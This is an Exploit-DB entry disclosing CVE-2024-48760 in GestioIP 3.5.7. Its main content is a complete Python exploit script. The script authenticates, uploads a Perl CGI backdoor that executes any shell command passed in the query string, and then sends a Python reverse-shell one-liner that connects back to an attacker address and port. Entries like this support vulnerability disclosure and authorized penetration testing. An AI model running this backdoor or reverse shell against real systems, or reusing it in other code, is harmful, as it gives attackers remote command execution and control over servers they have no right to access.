GestioIP 3.5.7 - Remote Command Execution (RCE)

EDB-ID:

52204

CVE:

2024-48760

EDB Verified:

Author:

Maximiliano Belino

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2025-04-14

Vulnerable App: 
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";

my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g; 
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;

print "<html><body>";
print '<!-- CGI backdoor -->';

if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}

print "<pre>";
my @cmd = `$req`;
print "</pre>";

foreach my $line (@cmd) {
    print $line . "<br/>";
}

print "</body></html>";
"""

# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response

def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)

def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet

if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services